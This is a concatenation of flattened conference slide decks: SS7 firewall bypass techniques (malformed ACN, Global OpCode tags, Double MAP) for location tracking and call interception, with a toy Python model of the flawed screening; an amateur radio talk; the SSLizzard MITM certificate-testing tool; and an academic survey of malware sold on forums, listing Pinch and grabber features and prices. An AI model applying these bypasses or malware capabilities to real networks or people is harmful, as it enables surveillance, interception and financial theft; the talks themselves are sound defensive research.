 IMSI •  SMS Text 3. 
MT-SMS •  IMSI •  SMS Text SRI4SM — SendRoutingInfoForSM HLR SMS-C SRI4SM abuse by a malefactor STP MSC 1. SRI4SM Request •  MSISDN 1. SRI4SM Request •  MSISDN 2. SRI4SM Response •  IMSI •  MSC Address 2. SRI4SM Response •  IMSI •  MSC Address HLR SMS Home Routing SMS Router STP HLR MSC 1. SRI4SM Request •  MSISDN 1. SRI4SM Request •  MSISDN 3. MT-SMS •  Fake IMSI •  SMS Text 3. MT-SMS •  Fake IMSI •  SMS Text 4. SRI4SM Request •  MSISDN 6. MT-SMS •  Real IMSI •  SMS Text SMS-C 5. SRI4SM Response •  Real IMSI •  MSC Address 2. SRI4SM Response •  Fake IMSI •  SMS-R Address 2. SRI4SM Response •  Fake IMSI •  SMS-R Address SMS Home Routing against malefactors SMS Router STP HLR MSC 1. SRI4SM Request •  MSISDN 1. SRI4SM Request •  MSISDN 2. SRI4SM Response •  Fake IMSI •  SMS-R Address 2. SRI4SM Response •  Fake IMSI •  SMS-R Address SS7 firewall: typical deployment scheme HLR STP 1. SS7 message 3. SS7 message 2. SS7 message SS7 firewall: blocking rules Firewall rules Category 1 Block a message by an operation code SS7 Message HLR MSC Category 2 Block a message by an operation code and correlation of a source address and subscriber identity Category 3 Block a message by an operation code and subscriber’s real location SCCP Source / Destination TCAP Application Context MAP OpCode, IMSI, … SS7 firewall SS7 attacks and vulnerabilities IMSI disclosure via a malformed Application Context Name (ACN) parameter Location tracking via Operation Code Tag substitution Voice call interception (MiTM) via a Double MAP vulnerability IMSI disclosure Exploitation of malformed ACN TCAP protocol TCAP Message Type — mandatory Transaction IDs — mandatory Dialogue Portion — optional Component Portion — optional Changing ACN 0 – CCITT 4 – Identified Organization 0 – ETSI 0 – Mobile Domain 1 – GSM/UMTS Network 0 – Application Context ID 20 – ShortMsgGateway 3 – Version 3 0 – CCITT 4 – Identified Organization 4 – Unknown 0 – Mobile Domain 1 – GSM/UMTS Network 0 – Application Context ID 20 – ShortMsgGateway 3 – Version 3 TCAP Malformed ACN IMSI disclosure via malformed ACN HLR 1. SRI4SM Request: MSISDN Malformed ACN 1. SRI4SM Request: MSISDN Malformed ACN STP SMS Router Malformed ACN SCCP Destination HLR MAP OpCode, param HLR 1. SRI4SM Request: MSISDN Malformed ACN 1. SRI4SM Request: MSISDN Malformed ACN STP SMS Router SMS Router bypassed 2. SRI4SM Response: IMSI, MSC 2. SRI4SM Response: IMSI, MSC IMSI disclosure via malformed ACN HLR 1. SRI4SM Request: MSISDN Malformed ACN 1. SRI4SM Request: MSISDN Malformed ACN STP SMS Router 2. SRI4SM Response: IMSI, MSC 2. SRI4SM Response: IMSI, MSC Equal IMSIs mean the SMS Home Routing solution is absent or not involved. IMSI disclosure via malformed ACN Location tracking Substitution of Operation Code Tag Mobile Network Operator Numbering plans Country Code (China) Network Destination Code Mobile Country Code (China) Mobile Network Code E.164 MSISDN and GT 86 854 1231237 E.212 IMSI 460 80 4564567894 Blocking rule: category 2 Source address Subscriber identity Operation code Switzerland ≠ China Category 2 Block a message by an operation code and correlation of a source address and subscriber identity ITU-T Q.773 Recommendation = 2 = 6 ITU-T Q.773 – Transaction capabilities formats and encoding Location tracking via Global OpCode 1. PSI with Global OpCode tag 2. PSI with Global OpCode tag The SS7 FW is looking for a Local OpCode. Global OpCodes are ignored. 3. PSI with Global OpCode tag STP MSC/VLR STP 4. PSI Response: Cell ID 4. PSI Response: Cell ID MSC/VLR 1. 
PSI with Global OpCode tag 2. PSI with Global OpCode tag 3. PSI with Global OpCode tag The VLR replies with the Local OpCode and a requested cell identity. Equipment of four vendors replies to signaling messages with the Global OpCode. Location tracking via Global OpCode Voice call interception (MiTM) Exploitation of a Double MAP vulnerability 1. InsertSubscriberData Request: IMSI Spoofed billing platform address 1. InsertSubscriberData Request: IMSI Spoofed billing platform address STP MSC/VLR Voice call interception (MiTM) 1. InsertSubscriberData Request: IMSI Spoofed billing platform address 1. InsertSubscriberData Request: IMSI Spoofed billing platform address STP 2. InsertSubscriberData Response 2. InsertSubscriberData Response MSC/VLR 3. TCAP End 3. TCAP End Voice call interception (MiTM) 1. InitialDP: IMSI, A-Num, B-Num 1. InitialDP: IMSI, A-Num, B-Num STP MSC/VLR Voice call interception (MiTM) 1. InitialDP: IMSI, A-Num, B-Num 1. InitialDP: IMSI, A-Num, B-Num STP 2. Connect :PBX-Num 2. Connect :PBX-Num MSC/VLR Voice call interception (MiTM) 1. InitialDP: IMSI, A-Num, B-Num 1. InitialDP: IMSI, A-Num, B-Num STP 2. Connect :PBX-Num 2. Connect :PBX-Num MSC/VLR 3. IAM: A-Num, B-Num 3. IAM: A-Num, B-Num Voice call interception (MiTM) SS7 FW against MiTM attack 1.  InsertSubscriberData Request: IMSI, Spoofed billing platform address STP MSC/VLR 2. InsertSubscriberData Request: IMSI, Spoofed billing platform address The SS7 FW correlates the IMSI and source address and blocks the InsertSubscriberData message. Switzerland ≠ China TCAP protocol TCAP Message Type — mandatory Transaction IDs — mandatory Dialogue Portion — optional Component Portion — optional Double MAP component TCAP Message Type — mandatory Transaction IDs — mandatory Dialogue Portion — optional Component Portion — optional Component 1 Component 2 The SS7 FW checks a subscriber’s ID in the first component considering the other data as a long payload not meant to be inspected. Double MAP in MiTM attack STP SS7 FW TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ MSC/VLR Inspect the first component only and forward the message to the network PBX Send the message to the SS7 FW for inspection STP SS7 FW TCAP Continue ReturnError MSC/VLR Double MAP in MiTM attack TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX STP SS7 FW TCAP Continue ReturnError TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ MSC/VLR Double MAP in MiTM attack TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ Inspect the first component only and forward the message to the network. 
PBX STP SS7 FW TCAP Continue ReturnError TCAP Continue ReturnResultLast MSC/VLR Double MAP in MiTM attack TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX STP SS7 FW TCAP Continue ReturnError TCAP Continue ReturnResultLast TCAP Continue ReturnResultLast MSC/VLR Double MAP in MiTM attack TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX STP SS7 FW TCAP Continue ReturnError TCAP Continue ReturnResultLast TCAP Continue ReturnResultLast TCAP End MSC/VLR Double MAP in MiTM attack TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX STP SS7 FW TCAP Continue ReturnError TCAP Continue ReturnResultLast TCAP Continue ReturnResultLast TCAP End MSC/VLR Double MAP in MiTM attack TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX STP SS7 FW TCAP Continue ReturnError TCAP Continue ReturnResultLast TCAP Continue ReturnResultLast MSC/VLR Double MAP in MiTM attack TCAP End TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX STP SS7 FW TCAP Continue ReturnResultLast MSC/VLR TCAP Continue ReturnResultLast TCAP Continue ReturnError Double MAP in MiTM attack TCAP End TCAP Continue InsertSubscriberData_REQ InsertSubscriberData_REQ TCAP Begin DeleteSubscriberData_REQ InsertSubscriberData_REQ PBX Main issues in SS7 security SS7 architecture flaws Configuration mistakes Software bugs Conclusion 1.  Check if your security tools are effective against new vulnerabilities. 2.  Use an intrusion detection solution alone with an SS7 firewall in order to detect threats promptly and block a hostile source. 3.  Block TCAP Begin messages with double MAP components. We observed only one legal pair: BeginSubscriberActivity + ProcessUnstructuredSS-Data. 4.  Configure your STP and SS7 firewall carefully. Do not forget about malformed Application Context Name and Global OpCodes. Thank you! spuzankov@ptsecurity.com Sergey Puzankov for ______
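The firewall behavior in the slides above is described only in prose, so the following is just a toy model in Python (invented data structures; it does not parse real TCAP/MAP) of the two screening shortcuts the talk calls out: an opcode is matched only when it is carried with the local tag (2 per ITU-T Q.773, versus 6 for the global tag), and only the first component of a message is inspected. That is enough to show why the Global OpCode request and the double-MAP message both sail through.

# Toy model only: invented structures, not a real SS7/TCAP parser.
LOCAL_OPCODE_TAG = 2     # ITU-T Q.773 local operation code tag
GLOBAL_OPCODE_TAG = 6    # ITU-T Q.773 global operation code tag

BLOCKED_OPS = {"ProvideSubscriberInfo", "InsertSubscriberData"}

def naive_screen(components):
    """Mimic the flawed rules: look only at the first component, and only
    match the opcode when it is carried with the local tag."""
    first = components[0]
    if first["tag"] == LOCAL_OPCODE_TAG and first["op"] in BLOCKED_OPS:
        return "BLOCK"
    return "PASS"

# Bypass 1: the same PSI request, but the opcode is sent with the global tag.
psi_global = [{"tag": GLOBAL_OPCODE_TAG, "op": "ProvideSubscriberInfo"}]

# Bypass 2: a harmless-looking first component with the attack in the second.
double_map = [
    {"tag": LOCAL_OPCODE_TAG, "op": "DeleteSubscriberData"},
    {"tag": LOCAL_OPCODE_TAG, "op": "InsertSubscriberData"},  # never inspected
]

print(naive_screen(psi_global))   # PASS - the location-tracking request gets through
print(naive_screen(double_map))   # PASS - the InsertSubscriberData attack gets through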
pdf
DCFluX in: License to Transmit DCFluX in: License to Transmit Presented By: Matt Krick, DCFluX – K3MK Chief Engineer, New West Broadcasting Systems, Inc. DEFCON 19; Las Vegas, NV “Where have all the weirdos gone?” --Moxie Marlinspike Hidden Agenda 1. Fuck Your Stupid Smart Phone 2. Amateur Radio 3. Getting Started 0. About the Author 5. General Incompetence 4. Commercial To Amateur Hacks • Matt Krick • “DCFluX” • Video Editor • Broadcast Engineer – 1998 to Present • K3MK – Licensed to Transmit, 1994 to Present 0. About the Author Radio Merit Badge 1. Fuck Your Stupid Smart Phone 1. Fuck Your Stupid Smart Phone 1. Fuck Your Stupid Smart Phone • Phone Patch • Auto Patch Phone Calls 1. Fuck Your Stupid Smart Phone • Frequency Modulation • Amplitude Modulation – Single Side Band • Digital Modulation – Project 25 Push To Talk 1. Fuck Your Stupid Smart Phone • Morse Code – CW • Radio Teletype – RTTY – Baudot • Packet – AX.25 • Phase Shift Keying – PSK31 Text Messaging 1. Fuck Your Stupid Smart Phone • SSTV (Slow Scan Television) • Packet Picture Mail 1. Fuck Your Stupid Smart Phone • ATV (Amateur Television) • Amplitude Modulated • Frequency Modulated • D-ATV (Digital Amateur Television) • 8-VSB • COFDM • DSS Video Chat 1. Fuck Your Stupid Smart Phone • APRS (Amateur Packet Reporting System) Location Awareness 1. Fuck Your Stupid Smart Phone • Long Range WiFi – 902 – 928 MHz • 2.4 GHz (802.11b) – 2400 – 2450 MHz • 5.7 GHz (802.11a) – 5680 – 5825 GHz Up to 1500 W PEP (+62 dBm) Internet Access 1. Fuck Your Stupid Smart Phone App Store 1. Fuck Your Stupid Smart Phone No Phone Company Required 1. Fuck Your Stupid Smart Phone Yaesu FT-530 Yaesu FT-530 1. Fuck Your Stupid Smart Phone 1. Fuck Your Stupid Smart Phone Kenwood TH-77A Kenwood TH-77A 1. Fuck Your Stupid Smart Phone 2. Amateur Radio Citizens’ Band ≠ Amateur Radio Citizens’ Band ≠ Amateur Radio FluX Makes Things Simple 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio FRS, GMRS, MURS ≠ Amateur Radio FRS, GMRS, MURS ≠ Amateur Radio FluX Makes Things Simple 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio FCC = “The Man” FCC = “The Man” FluX Makes Things Simple 2. Amateur Radio FluX Makes Things Simple ~ ~ 2. Amateur Radio FluX Makes Things Simple ~ ~ Amateur Radio Spectrum • 160m – 1.8 – 2.0 MHz • 80m – 3.5 – 4.0 MHz • 60m* – 5.3 – 5.4 MHz • 40m – 7.1 – 7.3 MHz • 30m – 10.1 – 10.15 MHz • 20m – 14.0 – 14.35 MHz • 17m – 18.068 – 18.168 MHz • 15m – 21.1 – 21.450 MHz • 12m – 24.89 – 24.99 MHz • 10m – 28.0 – 29.7 MHz 2. Amateur Radio Amateur Radio Spectrum • 6m – 50 – 54 MHz • 2m – 144 – 148 MHz • 1.25m – 219 – 220 MHz – 222 – 225 MHz • 70cm – 420 – 450 MHz • 33cm – 902 – 928 MHz • 23cm – 1.24 – 1.3 GHz • 13cm – 2.3 – 2.31 GHz – 2.39 – 2.45 GHz And More! 2. Amateur Radio Minimum Maximum SSCW (Morse Code) 0.1 Hz 20 Hz CW (Morse Code) 20 Hz 150 Hz RTTY 270 Hz 370 Hz PSK31 - 37.5 Hz Side Band Phone 2.4 kHz 3 kHz AM Phone 5 kHz 10.2 kHz FM Phone 8 kHz 16 kHz AM Television 6 MHz 10 MHz WiFi Data 1 MHz 22 MHz Bandwidth of Popular Modes 2. Amateur Radio Build Your Own Mode 2. 
Amateur Radio • Digital Voice • Digital Data • Digital Television • Analog HDTV • Analog Telemetry • Vestigial Side Band Voice • Super Slow Analog Data Surprise Me! Surprise Me! Some Restrictions Apply 2. Amateur Radio • No Broadcasting – No music, unless part of a NASA rebroadcast • No Swearing – Don’t use the Seven Dirty Words And More! • ID Transmissions – Every 10 minutes • No obscuring the meaning of communication • No Encryption – Unless commanding a satellite 2. Amateur Radio Don’t be an ass-hat on Amateur Radio. Don’t be an ass-hat on Amateur Radio. FluX Makes Things Simple The Good Stuff 2. Amateur Radio • Experimental ‘Test’ Modes allowed on all bands – Pulse and Spread Spectrum Limited • Unlimited Bandwidth on 33cm and above • 1500 W PEP on most bands – 50 W PEP on 60m – 200 W PEP on 30m – 50 W PEP on 70cm in some locations • Unlimited ERP 47 CFR 2.106 Footnote US7 2. Amateur Radio 2. Amateur Radio FluX Makes Things Simple • PEP = Peak Envelope Power – Peak Power at leaving the transmitter • ERP = Effective Radiated Power – Power in to the radio horizon after feed line loss and antenna gain 2. Amateur Radio FluX Makes Things Simple Higher Antenna Gain = Narrower Beamwidth Higher Antenna Gain = Narrower Beamwidth 2. Technician (No Code) 1. Novice 3. General 5. Extra 4. Advanced 3. Getting Started Classes of Operator 1. Technician 2. General 3. Extra 3. Getting Started Classes of Operator FluX Makes Things Simple No Morse Code requirement No Morse Code requirement 3. Getting Started 1. Technician 3. Getting Started • All Privileges on 6m and Up – 200 W PEP below 6m – CW only on 80m, 40m, 15m – CW, RTTY and Data on 10m – SSB Voice on 10m 28.3 – 28.5 MHz 3. Getting Started All Technician privileges plus: • Most HF privileges – 400 kHz of bandwidth reserved for Advanced and Extra • Ability to administer VE Technician tests 2. General 3. Getting Started All Technician and General privileges plus: • All frequency privileges • Ability to administer all VE tests • Entitled to Class A and Class B call signs 3. Extra 3. Getting Started Call Sign Regions 3. Getting Started 3. Getting Started 3. Getting Started Amateur Electronic Supply 4640 Polaris Ave. (800) 634-6227 Amateur Electronic Supply 4640 Polaris Ave. (800) 634-6227 3. Getting Started $25 - 30 Each $25 - 30 Each 3. Getting Started • www.arrl.org/question-pools • www.arrl.org/exam-practice • www.qrz.com/exams • www.eham.net/exams Free Online Resources Questions Pool Questions on exam Passing grade Technician 396 35 26 General 456 35 26 Extra 738 50 37 3. Getting Started Questions Pool Size Cost of Exam: $15 Cost of Exam: $15 3. Getting Started FluX Makes Things Simple DEFCON 16 VE Team 3. Getting Started 3. Getting Started Ass Kicked By A Blind Man Ass Kicked By A Girl 3. Getting Started 4. Commercial To Amateur Hacks Golden Age of Amateur Radio • 1st Narrow Banding (1963) • 15 kHz FM Deviation to 5 kHz • 50 kHz Channel Spacing to 15 and 25 kHz • 2nd Narrow Banding (2013) • 5 kHz Deviation to 2.5 kHz • UHF – 25 kHz Channel Spacing to 12.5 kHz • VHF – 15 kHz Channel Spacing to 7.5 kHz 4. Commercial To Amateur Hacks 4. Commercial To Amateur Hacks 4. Commercial To Amateur Hacks 150-174 MHz to 144-148 MHz 4. Commercial To Amateur Hacks 150-174 MHz to 144-148 MHz 4. Commercial To Amateur Hacks 403-420 MHz to 440-450 MHz 4. Commercial To Amateur Hacks 450-470 MHz to 440-450 MHz 4. Commercial To Amateur Hacks • GE MASTR-II Receiver Tin Whiskers 450-470 MHz to 440-450 MHz 4. Commercial To Amateur Hacks 150-174 MHz to 222-225 MHz 4. 
Commercial To Amateur Hacks 150-174 MHz to 222-225 MHz 4. Commercial To Amateur Hacks 150-174 MHz to 222-225 MHz 4. Commercial To Amateur Hacks 150-174 MHz to 222-225 MHz 4. Commercial To Amateur Hacks 150-174 MHz to 222-225 MHz 4. Commercial To Amateur Hacks 40-50 MHz to 50-54 MHz 4. Commercial To Amateur Hacks 40-50 MHz to 50-54 MHz 4. Commercial To Amateur Hacks 5. General Incompetence 5. General Incompetence 5. General Incompetence 5. General Incompetence 5. General Incompetence 5. General Incompetence Questions? Questions? matt@kgmn.net In the Q&A Room In the Q&A Room DCFluX in: License to Transmit DCFluX in: License to Transmit A Series of Tubes 2. Amateur Radio
pdf
DEF CON 19: Getting SSLizzard Nicholas J. Percoco – Trustwave SpiderLabs Paul Kehrer – Trustwave SSL Copyright Trustwave 2011 Agenda •  Introductions •  Primer / History: SSL and MITM Attacks •  Mobile SSL User Experience •  Research Motivations •  Research Implications •  Data Transmission Assault Course Components •  Introducing SSLizzard •  Mobile App Test Results •  Conclusions Copyright Trustwave 2011 Introductions Who are we? Nicholas J. Percoco (c7five) •  Head of SpiderLabs at Trustwave •  Started my InfoSec career in the 90s Paul Kehrer (reaperhulk) •  Lead SSL Developer at Trustwave •  Enjoys baking cakes in spare time. Copyright Trustwave 2011 Introductions What’s this talk about? •  De-evolution of User Security Experience (in Mobile Devices) •  History and Types of SSL Attacks •  Lack of Testing Tools for Mobile Applications •  How Various App and Devices Perform Under “SSL Stress” •  A Tool Release to Help Solve this Problem Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks What is SSL? •  Stands for “Secure Sockets Layer” •  Developed by Netscape in 1994 •  Implemented in Netscape Navigator 1.0 •  A protocol to secure a client->server data transmission •  Uses Asymmetric Keys to establish a Symmetric Key •  This happens during a “handshake” before actual data is transmitted Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks •  Where is SSL (certs) Used? •  To Establish Secure Client to Server Communication •  Client Identity (User Authentication) •  Application Signing •  Log File Integrity Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks •  How is SSL used in Mobile Devices? •  To Secure Communication Over Public Networks •  To Establish “App” to Server Communication •  “App” Code Signing (Android, IOS, BlackBerryOS) •  Mobile Device Management Profiles (Signed) Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks •  What is a Man-in-the-Middle Attack? •  Injecting an “Attacker” between a Client and a Server Session. •  “Attacker” intercepts Client request to Server •  “Attacker” established a SECURE Session with Server •  “Attacker” established a UNTRUSTED Session with Client •  “Attacker” can then view / modified data between Client and Server Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks •  What tools exist to help w/ MITM Attacks? •  thicknet – MITM framework developed by Steve Ocepek (SpiderLabs) •  ettercap – “is a suite for man in the middle attacks on LAN” •  arpspoof – facilitates “arp poising” •  mitmproxy – “is an SSL-capable, intercepting HTTP proxy” •  sslstrip – relies on arpspoof then“strips” the SSL session to force Client to talk HTTP to attacker Copyright Trustwave 2011 Primer / History: SSL and MITM Attacks •  Why is true SSL MITM difficult? •  SSL certificates have a “chain of trust” •  Attacking public CAs not impossible, but not practical •  Self-Signed Certs throw Client errors •  Malformed Certs are difficult to generate Copyright Trustwave 2011 Mobile SSL User Experience •  No Standard UI •  Most Cases -> No UI At ALL! 
•  Cryptic Warming Messages •  Users Don’t Know the Difference •  Pop-up could be BS Copyright Trustwave 2011 Research Motivations •  The Browser Community spent almost two decades tweaking the UI behavior when it comes to SSL •  The Mobile Device market destroyed that in less than five years •  There are no standards that today’s mobile users expect to see when their data is transmitted via SSL Copyright Trustwave 2011 Research Motivations •  Most apps completely ignore the UI aspect of security •  There is zero functionality difference between an app that sends data in the clear vs. encrypted •  App developers need to pay attention to this, but also need tools to help them test SSL behavior easily and consistently Copyright Trustwave 2011 Research Implications •  Attackers are focusing more mobile app weaknesses •  If a popular app mishandles SSL, their users are more susceptible to attacks •  Credential Stealing •  Data Interception •  Response Manipulation •  These attacks will go unnoticed due to: •  Lack of User Awareness of the Risks •  Lack of UI Cues within Apps Copyright Trustwave 2011 Data Transmission Assault Course Components •  How do you build a test lab? •  Wireless Switch •  WRT-54GL running Tomato Firmware •  Attacker System •  Linux (must be connect via Ethernet to Switch) •  ettercapNG-0.7.3 (w/ SpiderLabs patch) •  Victim Clients •  Android (Nexus S – v2.3.4) •  iPod Touch 4th Gen (v4.3.3) Copyright Trustwave 2011 Data Transmission Assault Course Components What types of SSL certs do you need? 1.  Valid for Target Domain (i.e. www.myapp.com) 2.  Various Malformed SSL Certificates: •  Null Prefix (big news in 2010) •  CRLF •  Self-Signed •  Signed by Parent Cert (set CA:FALSE) •  Invalid ASN.1 Structures (Fuzzing) •  Broken Encodings 3.  A Method to Generate the Above Easily… Copyright Trustwave 2011 Introducing SSLizzard - About •  SSLizzard is an open source toolkit to easily generate multiple types of invalid SSL certs for ANY given domain. •  The output is then used in various MITM frameworks to perform the SSL attack •  Successfully tested with ettercap (see patch on DVD) •  A thicknet module is being developed by Steve Ocepek. •  Can be used against any OS, Application or Browser. Copyright Trustwave 2011 Introducing SSLizzard – Uses / Usage •  Command Line •  ruby sslizzard.rb mydomain.com •  Generates a key and a number of certificates with various invalid structures for testing. 
•  Output is written in the current working directory Copyright Trustwave 2011 Introducing SSLizzard – Setup a Test •  Execute SSLizzard to generate certs •  Set up ettercap (patched) with –x flag to specify cert type you want to test •  Use your app as normal and see if you get error msgs •  If you don’t get errors, check ettercap to see if data was intercepted •  You will need to execute ettercap once per cert type generated by SSLizzard to comprehensively test Copyright Trustwave 2011 Introducing SSLizzard - Demo •  Generating a collection of certs •  Using the certs in ettercap (SpiderLabs patch) •  Video of interception of traffic •  Video of victim devices throwing errors/not throwing errors Copyright Trustwave 2011 Mobile App Test Results TO BE RELEASED AT DEF CON 19 Copyright Trustwave 2011 Conclusions We need a world where: •  Developers use SSL for all data transmission •  Consistent, simple, UI that users can understand •  Apps and Devices that fail closed when there is a secure transmission problem Copyright Trustwave 2011 Trustwave’s SpiderLabs® SpiderLabs is an elite team of ethical hackers at Trustwave advancing the security capabilities of leading businesses and organizations throughout the world. More Information: Web: https://www.trustwave.com/spiderlabs Blog: http://blog.spiderlabs.com Twitter: @SpiderLabs Questions?
pdf
The Market for Malware Dr. Thomas J. Holt Assistant Professor Department of Criminal Justice University of North Carolina at Charlotte tjholt@uncc.edu 704-687-6081 Copyright 2007. All references to this work must appropriately cite the author, Thomas J. Holt. Digital Crime Markets • The problem of malware and computer based theft is increasing and becoming more complex – IC3 reports that spam and phishing complaints have increased over the past two years – CSI/FBI reports that virus contamination cost businesses $15 million and bot damages were estimated at $923,700 in 2006 – Law enforcement agencies have begun to crack down on malware users and data thieves • Operation Firewall, Operation Bot Roast Digital Crime Markets • There are a range of websites, forums, and IRC channels devoted to malicious computer activity – Malware, carding, and stolen data • These sites can provide direct information on current and emerging threats and the individuals responsible for their creation – Provides a snapshot of computer crime Data • Data generated from public web forums and sties actively involved in – Carding – Malware – Hacking and security • Posts were examined along with any available materials provided in each forum – Machine translations – Human translators Forum Structure • The forums are structured to act as advertising spaces for the sellers and writers – Individuals post their products or services – Moderators review and verify products – Buyers post feedback or questions – Sellers answer and address comments Customer Reviews of Malware • Oleg – Thank you for a FreeJoiner, is the best program in its class I have ever seen, the result of the use was not long in coming, weaknesses and suggestions on the work simply no! • f0rd – It is like this Joiner. The best of me once or seen many useful Fitch, Joiner make this one of the most powerful products on the market. • Zolden – Anticipate just super, which was bought at the height. Works well, connects all the files without exception, to find a new attacker. P.S. Huge RESPECT sponsors of the programme. • -=Humi™=- – Purchased a freejoiner 2 and left very happy....for each user, it's different ... Super Easy, Words can not explain. P.S. Greater Respect author of a remarkable tool! Bots: Suicide DDoS Bot • Suicide DDoS Bot by RKL a.k.a. 
Cr4sh – Control through web access and IRC – Botmaster controls can be separated at root user level in explorer.exe - ICMP, SYN, HTTP Flood - Injects code into trusted processes - SOCKS4 Proxy - Bindshell - Disguises itself in system through API intercept - Frequency ping bot – The bot is not detected by AV and can use any sort of packer for compression Bots: Illusion DDoS Bot • Illusion DDoS bot by Cyber Underground Project (CUP) – Is sold for up to $400, but older versions are available for free to members of some forums – Can control zombie machines through web access and IRC – Can be used for SYN, ICMP echo, UDP and HTTP GET Flooding – Can spoof IPs and use any source IP for flood command – Frequency ping bot – Multiple commands can be sent in one line via IRC separated by “|” symbol – Injects code into trusted processes – Disguises itself in system through API intercept – Bot password is coded by MD5 encryption to prevent “evil enemy” from learning your password and controlling the botnet – Has easy to use command interface Bots: Illusion DDoS Bot Trojans: Nuclear Grabber • Nuclear Grabber created by Corpse (http://corpsespyware.net) – Can be purchased from corpse, but cracked versions are available – Practically UNIVERSAL TAN (Transaction Authorization Number) grabber • Any bank you choose can be a target – “Technology makes it possible to effectively gather TANs and more” – “Entire process of collection is realized without pop-ups, false pages, false communications and crashed browser at the critical moment.” – Product CAN make transfers (with another tan) and does not require immediate use – Also acts as a consummate phishing tool Trojans: Nuclear Grabber Nuclear Grabber drags forms, captures check and scroll box menus, and defeats virtual keypads All captured information is split into three data streams and sent instantly to both a selected server and redirected to the original domain. Trojans: Nuclear Grabber • There are limited instances of individuals selling data stolen using Nuclear Grabber • D34th (posted 1.31.07) – At the given moment there is by 103 mb. Traffic - USA business. Nothing it touched from the lairs. I sell by the pieces: 8 MB = 6.5 wmz 13.0 MB = 10 wmz 26.1 MB = 20 wmz 26.8 MB = 21 wmz 29.0 MB = 23 wmz I work only through the guarantee, or the patronage on 999 days. Trojans: Pinch • Pinch is a well known trojan that is frequently used for data theft • The tool has gone through a variety of iterations – Originally sold by the creator, Coban2k, then the code was posted for free on-line – Latest version and custom builds can be purchased Trojans: Pinch • Pinch 2.99 – Written in Assembler and is about 20K in size – No special knowledge is needed to use Pinch – Obtains passwords from over 33 different programs including RDP, Outlook, and The Bat! – Sends passwords to you encoded in a pass.bin file by HTTP, SMTP, FTP, or file on local machine. – Supports Socks5 and command shell via telnet. – Compile statistics about the machine. – Changes icons, binds itself to another executable, set starting page for internet browser. – Creates favorites in IE, kill processes or services Trojans: Pinch • Pinch 2.99 – Adds listings information to the hosts file. – Cleans IE – Can turn into IRC-bot • Set server, port, channel and channel password – Starts as service, process, dll or other methods. – Hides itself from msconfig. – Start when online, specific time, or other. – Adds itself to Windows XP SP2 firewall allow list. 
– 4 Packers to choose from: MEW, UPX, UPACK, FSG Trojans: Pinch • Pinch can be customized for you and built for $30. – Guarantees that it will not be detected by antivirus when you buy it. • Contact 123555 to buy a copy. – Revisions $5 – Statistics server software bought separately ~$100. – Didn’t buy from 12355? Don’t contact for support Trojans: Pinch • New threads regularly appear with individuals selling stolen data obtained through Pinch – In a one week period in March of this year, five individuals sold stolen data obtained through pinch – V-and-h-e Sales of data from Pinch, 100 pieces of data= 3wmz – Aerot1smo I sell the reports of pinch on the track to the price of 100- 2 Traff: Us, Uk, Ru, De, It. Bonus: * to the permanent buyers of reduction! * with purchase 500 (or more) reports, you obtain 100 more! iccQ - 947490 – Kot777 I sell the reports of pinch from 100 pieces for 2 wmz... traffic of miks, during the day there is near 2k- 5k of reports... ICQ 328498627 Trojans: Pinch • Trojan Pinch.I Exim. • You see our tariff plans to log (Records), the famous Trojan Pinch. • We sell two types of logs : 1) Information "booty" the main parser : passwords, auto IE and others. 2) the information intercepted from the IE window, and others (very often hosting accumulators, with $ accumulation, etc.) Price : For one type of reporting : 100 pieces $ 1.5 the minimum order of 200 cards (ie, for $ 3) The two types of reports : 1 mb. , $ 0.3 Minimum order 20 mb. (ie $ 6) The traffic reports : Mostly Russian origin, in the direction of Europe about 39%, USA 15%. Working through code protection or guardian. Reports are delivered in one hand. Trojans: PG Universal Grabber • Power Grabber v1.8 Posted by Admin on 3.27.07 – Works with IE and browsers with IE based engine. – Works as loader, establishes necessary files, records in registry and deletes itself. – Invisible in processes, detours firewalls, invisible to AV. – Sends logs immediately after POST. – Loads files (Loads on UID bot. Can provide loading on other certain bot) – Updates old bots by new build (without restarting). • The full build costs $700 with antivirus protection for another $30 – Standard updates, bug fixes and optimization are free of charge. – Essential updates are charged (50 % from the added cost). Trojans: PG Universal Grabber Grabbing: • http/https inquiries (paypal, ebay, banks, trade, etc...). • FTP connections (Paths are saved in a separate file). • Virtual FLASH/J.S. keyboards (By transfer POST’s inquiry, not ciphered). • Keys Bank of America, and also keys of those banks which use system c *****keys (Deletes keys, answers to confidential questions are retrieved). • Protected Storage (IE/Outlook, Autocomplete Passwords, Fields) Work with E-Gold: • Auto loading in e-gold • Sends info (UID, IP, DateTime, Payee_account, Payer_account, amount) in a log and in admin right after loading. • Knocks on icq after loading. • Account number is retrieved from admin. • After loading site is inaccessible. *Trojan waits when holder accesses his account, then transfers 98 % on the account specified by you. Trojans: PG Universal Grabber Work with TAN: • Uses remote access and adjustment from the administrator’s panel. • TAN’s on DE are registered by default. • Technology works everywhere with the similar work approach(Poland, Lithuania, Netherlands, etc). It is necessary to register name_site + name_TAN. Work with Redirect: • Uses remote control from the admin panel. 
